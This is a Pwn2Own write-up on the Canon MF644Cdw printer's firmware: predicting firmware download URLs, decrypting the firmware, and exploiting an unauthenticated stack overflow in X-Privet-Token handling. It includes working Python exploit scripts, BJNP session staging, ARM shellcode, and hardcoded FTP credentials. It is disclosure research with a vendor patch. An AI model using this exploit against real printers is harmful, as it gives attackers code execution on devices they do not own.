
# Introduction

Pwn2Own Austin 2021 was announced in August 2021 and introduced new categories, including printers. Based on our previous experience with printers, we decided to go after one of the three models. Among those, the Canon ImageCLASS MF644Cdw seemed like the most interesting target: previous research was limited (mostly targeting Pixma inkjet printers). Based on this, we started analyzing the firmware before even having bought the printer.

Our team was composed of 3 members.

Note: This writeup is based on version 10.02 of the printer's firmware, the latest available at the time of Pwn2Own.

# Firmware extraction and analysis

The Canon website is interesting: you cannot download the firmware for a particular model without a serial number matching that model. This, as you might guess, is particularly annoying when you want to download the firmware for a model you do not own. Two options came to mind:

• Finding a picture of the model in a review or listing,
• Finding a serial number of the same model on Shodan.

Thankfully, the MF644Cdw was reviewed in detail by PCMag, and one of the pictures contained the serial number of the printer used for the review. This allowed us to download the firmware from the Canon USA website. The version available online on that website at the time was 06.03.

### Predicting firmware URLs

As a side note, once the serial number was obtained, we could download several versions of the firmware, for different operating systems. For example, version 06.03 for macOS has the following filename: mac-mf644-a-fw-v0603-64.dmg and the associated download link is https://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do?id=OTUwMzkyMzJk&cmp=ABR&lang=EN. As the URL implies, this page asks for the serial number and redirects you to the actual firmware if the serial is valid. In that case: https://gdlp01.c-wss.com/gds/5/0400006275/01/mac-mf644-a-fw-v0603-64.dmg.

Of course, the base64-encoded id in the first URL is interesting: once decoded, you get the literal string 95039232d which, in turn, is the hex representation of 40000627501, part of the actual firmware URL!

A few more examples led us to understand that the part of the URL with the single digit (/5/ in our case) is just the last digit of the next component of the URL's path (/0400006275/ in this example). We assume this is used for load balancing or a similar reason. Using this knowledge, we were able to download many different firmware images for various models. We also found out that the Canon pages for the USA and Europe are not as current as the Japanese page, which had version 09.01 at the time of writing.
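The id-to-URL relationship described above can be checked mechanically. Here is a sketch in Python, where the 12-digit zero-padding and the 10+2 path split are inferred from this single example:

```python
import base64

# Decode the id from the redirect URL (example values from above)
encoded_id = "OTUwMzkyMzJk"
decoded = base64.b64decode(encoded_id).decode()  # literal string "95039232d"
number = int(decoded, 16)                        # 40000627501

# Inferred layout: zero-pad to 12 digits, split into a 10-digit directory
# and a 2-digit suffix; the single load-balancing digit is the last digit
# of the directory component.
digits = str(number).zfill(12)                   # "040000627501"
directory, suffix = digits[:10], digits[10:]
url = (f"https://gdlp01.c-wss.com/gds/{directory[-1]}/{directory}/{suffix}/"
       "mac-mf644-a-fw-v0603-64.dmg")
```

Running this reproduces the download URL shown earlier for the macOS 06.03 image.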

However, all of them lag behind reality: the latest firmware version was 10.02, which is what the printer's own firmware update mechanism retrieves. https://gdlp01.c-wss.com/rmds/oi/fwupdate/mf640c_740c_lbp620c_660c/contents.xml gives us the actual up-to-date version.

### Firmware types

A small note about firmware "types". The update XML has 3 different entries per content kind:

<contents-information>
  <content kind="bootable" value="1" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
    <query arg="id" value="OTUwMzZkMDQ5" />
    <query arg="cmp" value="Z03" />
    <query arg="lang" value="JA" />
  </content>
  <content kind="bootable" value="2" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
    <query arg="id" value="OTUwMzZkMGFk" />
    <query arg="cmp" value="Z03" />
    <query arg="lang" value="JA" />
  </content>
  <content kind="bootable" value="3" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
    <query arg="id" value="OTUwMzZkMTEx" />
    <query arg="cmp" value="Z03" />
    <query arg="lang" value="JA" />
  </content>


Which correspond to:

• gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEA_V10.02.bin
• gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEB_V10.02.bin
• gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEC_V10.02.bin

Each type corresponds to one of the models listed in the XML URL:

• MF640C => TYPEA
• MF740C => TYPEB
• LBP620C => TYPEC
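The download URLs for the three types can be rebuilt from the update XML with a few lines of Python. A sketch, assuming the full contents.xml closes the contents-information element:

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlencode

def bootable_urls(xml_text):
    """Return (type value, version, download URL) for each bootable entry."""
    out = []
    for content in ET.fromstring(xml_text).iter("content"):
        if content.get("kind") != "bootable":
            continue
        # Rebuild the query string from the <query> children
        args = {q.get("arg"): q.get("value") for q in content.findall("query")}
        out.append((content.get("value"), content.get("version"),
                    content.get("base_url") + "?" + urlencode(args)))
    return out
```

Each returned URL points at the WWUFORedirectSerialTarget.do redirect page, exactly like the manually-built links above.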

## Decryption: black box attempts

### Basic firmware extraction

Windows updates such as win-mf644-a-fw-v0603.exe are Zip SFX files, which contain the actual updater: mf644c_v0603_typea_w.exe. This is the end of the PE file as seen in Hiew:

004767F0:  58 50 41 44-44 49 4E 47-50 41 44 44-49 4E 47 58  XPADDINGPADDINGX
00072C00:  4E 43 46 57-00 00 00 00-3D 31 5D 08-20 00 00 00  NCFW    =1]


As you can see (the address changes from RVA to physical offset), the firmware update seems to be stored at the end of the PE as an overlay, and conveniently starts with an NCFW magic header. macOS firmware updates can be extracted with 7z and contain a big file, mf644c_v0603_typea_m64.app/Contents/Resources/.USTBINDDATA, which is almost the same as the Windows overlay except for the PE signature and some offsets.

After looking at a bunch of firmware images, it became clear that the footer of the update contains information about various parts of the firmware update, including a nice USTINFO.TXT file which describes the target model, etc. The NCFW magic also appears several times in the biggest "file" described by the UST footer. After some trial and error, we understood its format, which allowed us to split the firmware into its basic components.

All this information was compiled into the unpack_fw.py script.

### Weak encryption, but how weak?

The main firmware file Bootable.bin.sig is encrypted, but it seems encrypted with a very simple algorithm, as we can determine by looking at the patterns:

00000040  20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F   !"#$%&'()*+,-./
00000050  30 31 32 33 34 35 36 37 38 39 3A 3B 39 FC E8 7A  0123456789:;9..z
00000060  34 35 4F 50 44 45 46 37 48 49 CA 4B 4D 4E 4F 50  45OPDEF7HI.KMNOP
00000070  51 52 53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60  QRSTUVWXYZ[\]^_`


The usual assumption of having big chunks of 00 or FF in the plaintext firmware allows us to form several hypotheses about the potential encryption algorithm. The increasing numbers most probably imply some sort of byte counter. We then tried to combine it with some basic operations and tried to decrypt:

• A xor with a byte counter => fail
• A xor with counter and feedback => fail

Attempting to use a known plaintext (where the plaintext is not 00 or FF) was impossible at this stage, as we did not have a decrypted firmware image yet. Having a reverser in the team, the obvious next step was to try to find code which implements the decryption:

• The updater tool does not decrypt the firmware but sends it as-is => fail
• Check the firmware of previous models to try to find unencrypted code which supports encrypted "NCFW" updates => fail
• However, we found unencrypted firmware files with a similar structure, which gave us a bit of known plaintext but did not give any real clue about the solution.

# Hardware: first look

## Main board and serial port

Once we received the printer, we of course started dismantling it to look for interesting hardware features and ways to help us get access to the firmware. Looking at the hardware, we considered these different approaches to obtain more information:

• An SPI flash is present on the mainboard: read it,
• An eMMC is present on the mainboard: unsolder and read it,
• Find an older model with unencrypted firmware and a simpler flash to unsolder, read, profit. Fortunately, we did not have to go further in this direction,
• Some printers are known to have a serial port for debug providing a mini shell: find one and use it to run debug commands in order to get a plaintext/memory dump (note: of course, we found the serial port afterwards).

## Service mode

All enterprise printers have a service mode, intended for technicians to diagnose potential problems. YouTube is a good source of info on how to enter it. On this model, the dance is a bit weird, as one must press "invisible" buttons. Once in service mode, debug logs can be dumped on a USB stick, which creates several files:

• SUBLOG.TXT
• SUBLOG.BIN, which is obviously SUBLOG.TXT, encrypted with an algorithm which exhibits the same patterns as the encrypted firmware.

## Decrypting firmware

### Program synthesis approach

At this point, this was our train of thought:

• The encryption algorithm seemed "trivial" (lots of patterns, byte by byte),
• SUBLOG.TXT gave us lots of plaintext,
• We were too lazy to find it by blackbox/reasoning.

As program synthesis has evolved quite fast in the past years, we decided to try to get a tool to synthesize the decryption algorithm for us, using the known plaintext from SUBLOG.TXT as constraints. Rosette seemed easy to use and well suited, so we went with that. We started by following a nice tutorial which worked over the integers, but it gave us a bit of a headache when we tried to convert it directly to bitvectors. However, we quickly realized that we didn't have to synthesize a program (for all inputs), but actually to solve an equation where the unknown was the program which would satisfy all the constraints built using the known plaintext/ciphertext pairs. The "Essential" guide to Rosette covers this in an example.

So we started by defining the "program" grammar and the crypt function, which defines a program using the grammar, with two operands, up to 3 layers deep:

(define int8? (bitvector 8))
(define (int8 i) (bv i int8?))

(define-grammar (fast-int8 x y)        ; Grammar of int8 expressions over two inputs:
  [expr (choose x y (?? int8?)         ; <expr> := x | y | <8-bit integer constant> |
                ((bop) (expr) (expr))  ;           (<bop> <expr> <expr>) |
                ((uop) (expr)))]       ;           (<uop> <expr>)
  [bop (choose bvadd bvsub bvand       ; <bop> := bvadd | bvsub | bvand | bvor |
               bvor bvxor bvshl        ;          bvxor | bvshl | bvlshr | bvashr
               bvlshr bvashr)]
  [uop (choose bvneg bvnot)])          ; <uop> := bvneg | bvnot

(define (crypt x i)
  (fast-int8 x i #:depth 3))

Once this is done, we can define the constraints, based on the known plain/encrypted pairs and their position (byte counter i). And then we ask Rosette for an instance of the crypt program which satisfies the constraints:

(define sol
  (solve
    (assert  ; removing constraints speeds things up
      (&& (bveq (crypt (int8 #x62) (int8 0)) (int8 #x3d))
          ; [...]
          (bveq (crypt (int8 #x69) (int8 7)) (int8 #x3d))
          (bveq (crypt (int8 #x06) (int8 #x16)) (int8 #x20))
          (bveq (crypt (int8 #x5e) (int8 #x17)) (int8 #x73))
          (bveq (crypt (int8 #x5e) (int8 #x18)) (int8 #x75))
          (bveq (crypt (int8 #xe8) (int8 #x19)) (int8 #x62))
          ; [...]
          (bveq (crypt (int8 #xc3) (int8 #xe0)) (int8 #x3a))
          (bveq (crypt (int8 #xef) (int8 #xff)) (int8 #x20))))))

(print-forms sol)

After running racket rosette.rkt and waiting for a few minutes, we get the following output:

(list 'define '(crypt x i)
      (list 'bvor
            (list 'bvlshr '(bvsub i x)
                  (list 'bvadd (bv #x87 8) (bv #x80 8)))
            '(bvsub (bvadd i i) (bvadd x x))))

which is a valid decryption program! But it's a bit untidy, so let's convert it to C, with a trivial simplification:

uint8_t crypt(uint8_t i, uint8_t x) {
    uint8_t t = i - x;
    return (((2*t)&0xFF)|((t>>((0x87+0x80)&0xFF))&0xFF))&0xFF;
}

and compile it with gcc -m32 -O2 using https://godbolt.org to get the optimized version:

mov     al, byte ptr [esp+4]
sub     al, byte ptr [esp+8]
rol     al
ret

So our encryption algorithm was a trivial ror(x - i, 1)!

## Exploiting setup

After we decrypted the firmware and noticed the serial port, we decided to set up an environment that would facilitate our exploitation of the vulnerability.
We set up a Raspberry Pi on the same network as the printer, and also connected it to the printer's serial port. In this way, we could remotely exploit the vulnerability while controlling the status of the printer via the many features offered by the serial port.

## Serial port: dry shell

The serial port gave us access to the aforementioned dry shell, which provided incredible help to understand and control the printer status and debug it during our exploitation attempts. Among the many powerful features offered, here are the most useful ones:

• The ability to perform a full memory dump: a simple and quick way to retrieve the updated firmware unencrypted,
• The ability to perform basic filesystem operations,
• The ability to list the running tasks and their associated memory segments,
• The ability to start an FTP daemon, which will come in handy later,
• The ability to inspect the content of memory at a specific address. This feature was used a lot to understand what was going on during exploitation attempts.

One of the annoying things is the presence of a watchdog which restarts the whole printer if the HTTP daemon crashes. We had to run this command quickly after any exploitation attempt.

# Vulnerability

## Attack surface

The Pwn2Own rules state that if there's authentication, it should be bypassed. Thus, the easiest way to win is to find a vulnerability in a non-authenticated feature. This includes obvious things like:

• Printing functions and protocols,
• Various web pages,
• The HTTP server,
• The SNMP server.

We started by enumerating the "regular" web pages that are handled by the web server (by checking the registered pages in the code), including the weird /elf/ subpages. We then realized some other URLs were available in the firmware which were not obviously handled by the usual code: the /privet/ pages, which are used for cloud-based printing.

## Vulnerable function

Reverse engineering the firmware is rather straightforward, even if the binary is big.
The CPU is a standard ARMv7. By reversing the handlers, we quickly found the following function. Note that all names were added manually, either taken from debug logging strings or after reversing:

int __fastcall ntpv_isXPrivetTokenValid(char *token)
{
  int tklen; // r0
  char *colon; // r1
  char *v4; // r1
  int timestamp; // r4
  int v7; // r2
  int v8; // r3
  int lvl; // r1
  int time_delta; // r0
  const char *msg; // r2
  char buffer[256]; // [sp+4h] [bp-174h] BYREF
  char str_to_hash[28]; // [sp+104h] [bp-74h] BYREF
  char sha1_res[24]; // [sp+120h] [bp-58h] BYREF
  int sha1_from_token[6]; // [sp+138h] [bp-40h] BYREF
  char last_part[12]; // [sp+150h] [bp-28h] BYREF
  int now; // [sp+15Ch] [bp-1Ch] BYREF
  int sha1len; // [sp+164h] [bp-14h] BYREF

  bzero(buffer, 0x100u);
  bzero(sha1_from_token, 0x18u);
  memset(last_part, 0, sizeof(last_part));
  bzero(str_to_hash, 0x1Cu);
  bzero(sha1_res, 0x18u);
  sha1len = 20;
  if ( ischeckXPrivetToken() )
  {
    tklen = strlen(token);
    base64decode(token, tklen, buffer);
    colon = strtok(buffer, ":");
    if ( colon )
    {
      strncpy(sha1_from_token, colon, 20);
      v4 = strtok(0, ":");
      if ( v4 )
        strncpy(last_part, v4, 10);
    }
    sprintf_0(str_to_hash, "%s%s%s", x_privet_secret, ":", last_part);
    if ( sha1(str_to_hash, 28, sha1_res, &sha1len) )
    {
      sha1_res[20] = 0;
      if ( !strcmp_0((unsigned int)sha1_from_token, sha1_res, 0x14u) )
      {
        timestamp = strtol2(last_part);
        time(&now, 0, v7, v8);
        lvl = 86400;
        time_delta = now - LODWORD(qword_470B80E0[0]) - timestamp;
        if ( time_delta <= 86400 )
        {
          msg = "[NTPV] %s: x-privet-token is valid.\n";
          lvl = 5;
        }
        else
        {
          msg = "[NTPV] %s: issue_timecounter is expired!!\n";
        }
        if ( time_delta <= 86400 )
        {
          log(3661, lvl, msg, "ntpv_isXPrivetTokenValid");
          return 1;
        }
        log(3661, 5, msg, "ntpv_isXPrivetTokenValid");
      }
      else
      {
        log(3661, 5, "[NTPV] %s: SHA1 hash value is invalid!!\n", "ntpv_isXPrivetTokenValid");
      }
    }
    else
    {
      log(3661, 3, "[NTPV] ERROR %s fail to generate hash string.\n", "ntpv_isXPrivetTokenValid");
    }
    return 0;
  }
  log(3661, 6, "[NTPV] %s() DEBUG MODE: Don't check X-Privet-Token.", "ntpv_isXPrivetTokenValid");
  return 1;
}

The vulnerable code is the following line:

base64decode(token, tklen, buffer);

With some thought, one can recognize the bug from the function signature itself: there is no buffer length parameter passed in, meaning base64decode has no knowledge of the buffer's bounds. In this case, it decodes the base64-encoded value of the X-Privet-Token header into a local, stack-based buffer which is 256 bytes long. The header is attacker-controlled and limited only by HTTP constraints, so it can be much larger. This leads to a textbook stack-based buffer overflow. The stack frame is relatively simple:

-00000178 var_178         DCD ?
-00000174 buffer          DCB 256 dup(?)
-00000074 str_to_hash     DCB 28 dup(?)
-00000058 sha1_res        DCB 20 dup(?)
-00000044 var_44          DCD ?
-00000040 sha1_from_token DCB 24 dup(?)
-00000028 last_part       DCB 12 dup(?)
-0000001C now             DCD ?
-00000018                 DCB ? ; undefined
-00000017                 DCB ? ; undefined
-00000016                 DCB ? ; undefined
-00000015                 DCB ? ; undefined
-00000014 sha1len         DCD ?
-00000010
-00000010                 ; end of stack variables

The buffer array is not really far from the stored return address, so exploitation should be relatively easy. Initially, we found the call to the vulnerable function in the /privet/printer/createjob URL handler, which is not accessible before authenticating, so we had to dig a bit more.
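For reference, the token format implied by this check can be reproduced in Python. This is a sketch under the assumption that the firmware hashes the full zero-padded 28-byte str_to_hash buffer (as the decompiled code suggests); x_privet_secret is of course unknown to an attacker:

```python
import base64
import hashlib
import time

def make_token(secret, timestamp=None):
    # Token layout inferred from the check above: base64 of
    # "sha1_digest:timestamp", where the digest covers the zero-padded
    # 28-byte "secret:timestamp" buffer.
    ts = str(int(time.time()) if timestamp is None else timestamp).encode()
    to_hash = (secret + b":" + ts).ljust(28, b"\x00")
    digest = hashlib.sha1(to_hash).digest()  # 20 raw bytes
    # NB: a digest byte equal to ':' would confuse the firmware's strtok
    # parsing; this sketch ignores that corner case.
    return base64.b64encode(digest + b":" + ts)
```

Since forging a token requires the secret, the interesting path for an attacker is not this check but the unauthenticated decode that precedes it.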
## ntpv functions

The various ntpv URLs and handlers are nicely defined in two different arrays of structures, as you can see below:

privet_url nptv_urls[8] = {
    { 0, "/privet/info", "GET" },
    { 1, "/privet/register", "POST" },
    { 2, "/privet/accesstoken", "GET" },
    { 3, "/privet/capabilities", "GET" },
    { 4, "/privet/printer/createjob", "POST" },
    { 5, "/privet/printer/submitdoc", "POST" },
    { 6, "/privet/printer/jobstate", "GET" },
    { 7, NULL, NULL }
};

DATA:45C91C0C nptv_cmds       id_cmd <0, ntpv_procInfo>
DATA:45C91C0C                         ; DATA XREF: ntpv_cgiMain+338↑o
DATA:45C91C0C                         ; ntpv_cgiMain:ntpv_cmds↑o
DATA:45C91C0C                 id_cmd <1, ntpv_procRegister>
DATA:45C91C0C                 id_cmd <2, ntpv_procAccesstoken>
DATA:45C91C0C                 id_cmd <3, ntpv_procCapabilities>
DATA:45C91C0C                 id_cmd <4, ntpv_procCreatejob>
DATA:45C91C0C                 id_cmd <5, ntpv_procSubmitdoc>
DATA:45C91C0C                 id_cmd <6, ntpv_procJobstate>
DATA:45C91C0C                 id_cmd <7, 0>

After reading the documentation and reversing the code, it appeared that the register URL was accessible without authentication and called the vulnerable code.

# Exploitation

## Triggering the bug

Using a pattern generated with rsbkb, we were able to get the following crash on the serial port:

Dry> < Error Exception >
 CORE : 0
 TYPE : prefetch
 ISR  : FALSE
 TASK ID   : 269
 TASK Name : AsC2
 R 0 : 00000000   R 1 : 00000000   R 2 : 40ec49fc   R 3 : 49789eb4
 R 4 : 316f4130   R 5 : 41326f41   R 6 : 6f41336f   R 7 : 49c1b38c
 R 8 : 49d0c958   R 9 : 00000000   R10 : 00000194   R11 : 45c91bc8
 R12 : 00000000   R13 : 4978a030   R14 : 4167a1f4
 PC  : 356f4134   PSR : 60000013
 CTRL : 00c5187d
 IE(31)=0

Which gives:

$ rsbkb bofpattoff 4Ao5
Offset: 434 (mod 20280) / 0x1b2


Astute readers will note that the offset is too big compared to the local stack frame size, which is only 0x178 bytes. Indeed, the correct offset for PC, from the start of the local buffer is 0x174. The 0x1B2 which we found using the buffer overflow pattern actually triggers a crash elsewhere and makes exploitation way harder. So remember to always check if your offsets make sense.
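That sanity check is cheap to write down explicitly; a minimal sketch using the numbers above:

```python
# Numbers taken from the stack frame and the cyclic-pattern result above
FRAME_SIZE = 0x178      # size of the local stack frame
PC_OFFSET = 0x174       # real offset from the buffer to the saved return address
PATTERN_OFFSET = 0x1b2  # offset reported by rsbkb bofpattoff

# The reported offset exceeds the whole frame: the crash at 0x1b2 cannot be
# the saved return address being popped, so the pattern result is misleading.
assert PATTERN_OFFSET > FRAME_SIZE
assert PC_OFFSET < FRAME_SIZE
```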

## Buffer overflow

As the firmware lacks protections such as stack cookies, NX, and ASLR, exploiting the buffer overflow should be rather straightforward, even though the printer runs DRYOS, which differs from usual operating systems. Using the information gathered while researching the vulnerability, we built the following class to exploit the vulnerability and overwrite the PC register with an arbitrary address:

import struct

class OverflowPayload:
    # NB: the class name and the pc plumbing are reconstructions; the
    # original snippet elided them.
    def __init__(self, pc_addr):
        self.pc_addr = pc_addr

    @property
    def r4(self):
        return b"\x44\x44\x44\x44"

    @property
    def r5(self):
        return b"\x55\x55\x55\x55"

    @property
    def r6(self):
        return b"\x66\x66\x66\x66"

    @property
    def pc(self):
        return struct.pack("<I", self.pc_addr)

    def __bytes__(self):
        return (
            b":" * 0x160
            + struct.pack("<I", 0x20)  # pHashStrBufLen
            + self.r4
            + self.r5
            + self.r6
            + self.pc
        )


The vulnerability can then be triggered with the following code, assuming the printer's IP address is 192.168.1.100:

import base64
import http.client

# The overflow buffer (built with the class above, here called `payload`)
# goes base64-encoded into the X-Privet-Token header of an unauthenticated
# request; the exact request body was elided here.
headers = {
    "Content-type": "application/json",
    "Accept": "text/plain",
    "X-Privet-Token": base64.b64encode(payload).decode(),
}

conn = http.client.HTTPConnection("192.168.1.100", 80)
conn.request("POST", "/privet/register", "", headers)


To confirm the exploit's reliability, we simply jumped to a debug function's entry point (which printed information to the serial console) and observed that it worked consistently, though the printer rebooted afterwards because we hadn't cleaned the stack.

With this out of the way, we now need to work on writing a useful exploit. After reaching out to the organizers to learn more about their expectations regarding the proof of exploitation, we decided to show a custom image on the printer's LCD screen.

To do so, we could basically:

• Store our exploit in the buffer used to trigger the overflow and jump into it,
• Find another buffer we controlled and jump into it,
• Rely only on return-oriented programming.

Though the first method would have been possible (we found a convenient add r3, r3, #0x103 ; bx r3 gadget), we were limited by the size of the buffer itself, even more so because parts of it were being rewritten in the function's body. Thus, we decided to look into the second option by checking other protocols supported by the printer.

## BJNP

One of the supported protocols is BJNP, accessible on UDP port 8611, which was conveniently exploited by Synacktiv ninjas on a different printer. A third-party project adds a BJNP backend for CUPS, and the protocol itself is also dissected by Wireshark.

In our case, BJNP is very useful: it handles sessions and allows the client to store data (up to 0x180 bytes) on the printer for the duration of the session, which means we can precisely control how long our payload remains available in memory. Moreover, this data is stored in a field of a global structure, which means it is always located at the same address for a given firmware version. For the sake of our exploit, we reimplemented parts of the protocol using Scapy:

from scapy.packet import Packet
from scapy.fields import (
    EnumField,
    ShortField,
    StrLenField,
    BitEnumField,
    FieldLenField,
    StrFixedLenField,
)


class BJNPPkt(Packet):
    name = "BJNP Packet"

    BJNP_DEVICE_ENUM = {
        0x0: "Client",
        0x1: "Printer",
        0x2: "Scanner",
    }

    BJNP_COMMAND_ENUM = {
        0x000: "GetPortConfig",
        0x201: "GetNICInfo",
        0x202: "NICCmd",
        0x210: "SessionStart",
        0x211: "SessionEnd",
        0x212: "GetSessionInfo",
        0x221: "DataWrite",
        0x230: "GetDeviceID",
        0x232: "CmdNotify",
        0x240: "AppCmd",
    }

    BJNP_ERROR_ENUM = {
        0x8300: "Session error",
    }

    fields_desc = [
        StrFixedLenField("magic", default=b"MFNP", length=4),
        BitEnumField("device", default=0, size=1, enum=BJNP_DEVICE_ENUM),
        BitEnumField("cmd", default=0, size=15, enum=BJNP_COMMAND_ENUM),
        EnumField("err_no", default=0, enum=BJNP_ERROR_ENUM, fmt="!H"),
        ShortField("seq_no", default=0),
        ShortField("sess_id", default=0),
        FieldLenField("body_len", default=None, length_of="body", fmt="!I"),
        StrLenField("body", b"", length_from=lambda pkt: pkt.body_len),
    ]


For our version of the firmware, the BJNP structure is located at 0x46F2B294 and the session data sent by the client is stored at offset 0x24. We also want our payload to run in thumb mode to reduce its size, which means we need to jump to an odd address. All in all, we can simply overwrite the pc register with 0x46F2B294+0x24+1=0x46F2B2B9 in our original payload to reach the BJNP session buffer.
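The address arithmetic above can be written down explicitly (values specific to this firmware version):

```python
BJNP_STRUCT_ADDR = 0x46F2B294  # global BJNP structure (firmware 10.02)
SESSION_DATA_OFF = 0x24        # offset of the client-controlled session data
THUMB_BIT = 1                  # odd address => the branch switches to thumb mode

target_pc = BJNP_STRUCT_ADDR + SESSION_DATA_OFF + THUMB_BIT
assert target_pc == 0x46F2B2B9
```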

## Initial PoC

Quick recap of the exploitation strategy:

• Start a BJNP session and store our exploit in the session data,
• Exploit the buffer overflow to jump in the session buffer,
• Close the BJNP session to remove our exploit from memory once it ran.

To demonstrate this, we can jump to the function which disables the energy save mode on the printer (and wakes the screen up, which is useful to check if it actually worked). In our firmware, it is located at 0x413054D8, and we simply need to set the r0 register to 0 before calling it:

mov r0, #0
mov r12, #0x54D8
movt r12, #0x4130
blx r12


To avoid the printer rebooting, we can also fix the r0 and lr registers to restore the original flow:

mov r0, #0
mov r1, #0xEBA0
movt r1, #0x40DE
mov lr, r1
bx lr


Putting it all together, here is an exploit which does just that:

import time
import socket
import base64
import http.client

# NB: parts of this script (the DataWrite payload upload and the HTTP
# request) were elided; comments mark the reconstructed ordering.

# Connect to the BJNP service
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect(("192.168.1.100", 8610))

# Start a session
pkt = BJNPPkt(
    cmd=0x210,
    seq_no=0,
    sess_id=1,
)
pkt.show2()
sock.sendall(bytes(pkt))

res = BJNPPkt(sock.recv(4096))
res.show2()

# The printer should return a valid session ID
assert res.sess_id != 0, ValueError("Failed to create session")

# Store the payload in the session data (DataWrite, elided), then trigger
# the overflow over HTTP to jump into the session buffer
headers = {
    "Content-type": "application/json",
    "Accept": "text/plain",
}

conn = http.client.HTTPConnection("192.168.1.100", 80)

time.sleep(5)

# End the session to remove the payload from memory
pkt = BJNPPkt(
    cmd=0x211,
    seq_no=0,
    sess_id=1,
)
pkt.show2()
sock.sendall(bytes(pkt))

res = BJNPPkt(sock.recv(4096))
res.show2()

sock.close()


We can now build upon this PoC to create a meaningful payload. As we want to display a custom image on screen, we need to:

• Find a way of uploading the image data (as we're limited to 0x180 bytes in total in the BJNP session buffer),
• Make sure the screen is turned on (for example, by disabling the energy save mode as above),
• Call the display function with our image data to show it on screen.

## Displaying an image

As the firmware contains a number of debug functions, we were able to understand the display mechanism rather quickly. There is a function able to write an image into the frame buffer (located at 0x41305158 in our firmware) which takes two arguments: the address of an RGB image, and the address of a frame buffer structure which looks like this:

struct frame_buffer_struct {
unsigned short x;
unsigned short y;
unsigned short width;
unsigned short height;
};
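Host-side, the same structure can be packed with Python's struct module; a sketch assuming the target's little-endian byte order (consistent with the "<I" packing used for the overflow payload):

```python
import struct

def frame_buffer_struct(x, y, width, height):
    # Four unsigned 16-bit fields, little-endian, matching the C layout above
    return struct.pack("<4H", x, y, width, height)

fb = frame_buffer_struct(0, 0, 320, 240)
assert len(fb) == 8
```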


The frame buffer can only be used to display 320x240 pixels at a time which isn't enough to cover the whole screen as it is 800x480 pixels. We push this structure on the stack with the following code:

sub sp, #8
mov r0, #320
strh r0, [sp, #4]  ; width
mov r0, #240
strh r0, [sp, #6]  ; height
mov r0, #0
strh r0, [sp]      ; x
strh r0, [sp, #2]  ; y


Once this is done, assuming r5 contains the address of our image buffer, we display it on screen with the following code:

; Display frame buffer
mov r1, r5         ; Image buffer
mov r0, sp         ; Frame buffer struct
mov r12, #0x5158
movt r12, #0x4130
blx r12


This leaves the question of the image buffer itself.

## FTP

Though we thought of multiple options to upload the image, we ended up deciding to use a legitimate feature of the printer: it can serve as an FTP server, which is disabled by default. Thus, we need to:

• Enable the ftpd service,
• Upload our image from the client,
• Read the image in a buffer.

In our firmware, the function to enable the ftpd service is located at 0x4185F664 and takes 4 arguments: the maximum number of simultaneous clients, the timeout, the command port, and the data port. It can be enabled with the following payload:

mov r0, #0x3       ; Max clients
mov r1, #0x0       ; Timeout
mov r2, #21        ; Command port
mov r3, #20        ; Data port
mov r12, #0xF664
movt r12, #0x4185
blx r12


The ftpd service also has a feature to change directory; this doesn't really matter to us since the default directory is always S:/. We could, however, decide to change it, either to access data stored on other paths (e.g. the admin password) or to ensure our exploit works correctly even if the directory was somehow changed beforehand. To do so, we would need to call the function at 0x4185E2A4 with the r0 register set to the address of the new path string.

Once enabled, the FTP server requires credentials to connect. Fortunately for us, they are hardcoded in the firmware as guest / welcome. (the trailing dot is part of the password). We can upload our image (called a in this example) with the following code:

import ftplib

with ftplib.FTP(host="192.168.1.100", user="guest", passwd="welcome.") as ftp:
    with open("image.raw", "rb") as f:  # binary mode for storbinary
        ftp.storbinary("STOR a", f)
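The image.raw file itself must be raw RGB data matching the 320x240 frame buffer (3 bytes per pixel, as in the size computation used elsewhere in the exploit). A stdlib-only sketch generating a solid-red test image; the packed-RGB channel order is an assumption:

```python
WIDTH, HEIGHT, DEPTH = 320, 240, 3  # 320x240 pixels, 3 bytes per pixel

# One RGB triple per pixel, solid red (channel order assumed)
data = bytes((0xFF, 0x00, 0x00)) * (WIDTH * HEIGHT)
assert len(data) == WIDTH * HEIGHT * DEPTH  # 230400 bytes

with open("image.raw", "wb") as f:
    f.write(data)
```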


## File system

We are simply left with reading the image from the filesystem. Thankfully, DRYOS has an abstraction layer to handle this, allowing us to only look for the equivalent of the usual open, read, and close functions. In our firmware, they are located respectively at 0x416917C8, 0x41691A20, and 0x41691878. Assuming r5 contains the address of our image path, we can open the file like so:

mov r2, #0x1C0
mov r1, #0
mov r0, r5         ; Image path
mov r12, #0x17C8
movt r12, #0x4169
blx r12
mov r5, r0         ; File handle

; Exit if there was an error opening the file
cmp r5, #0
ble .end


As the image is too large to store on the stack, we could have dynamically allocated a buffer. However, the firmware contains debug images stored in writable memory, so we decided to overwrite one of them instead to simplify the exploit. We went with the one at 0x436A3F64, which originally contains a screenshot of a calculator.

Here is the payload to read the content of the file into this buffer:

; Get address of image buffer
mov r10, #0x3F64
movt r10, #0x436A

; Compute image size
mov r2, #320       ; Width
mov r3, #240       ; Height
mov r6, #3         ; Depth
mul r6, r6, r2
mul r6, r6, r3

; Read content of file in buffer
mov r3, #0         ; Bytes read
mov r4, r6         ; Bytes left to read
.loop:
mov r2, r4         ; Number of bytes to read
add r1, r10, r3    ; Buffer position
mov r0, r5         ; File handle
mov r12, #0x1A20
movt r12, #0x4169
blx r12
cmp r0, #0
ble .end_read      ; Exit in case of an error
sub r4, r4, r0
cmp r4, #0
bgt .loop


For completeness, here is how to close the file:

mov r0, r5
mov r12, #0x1878
movt r12, #0x4169
blx r12


## Putting everything together

In the end, our exploit is split into 3 parts:

1. Execute a first payload to enable the ftpd service and change to the S:/ directory,
2. Upload our image using FTP,
3. Exploit the vulnerability with another payload reading the image and displaying it on the screen.

You can find the script handling all this in the exploit.zip and you can see the exploit in action here.

It feels a bit... anticlimactic? Where is the Doom port for DRYOS when you need it...

# Patch

Canon published an advisory in March 2022 alongside a firmware update.

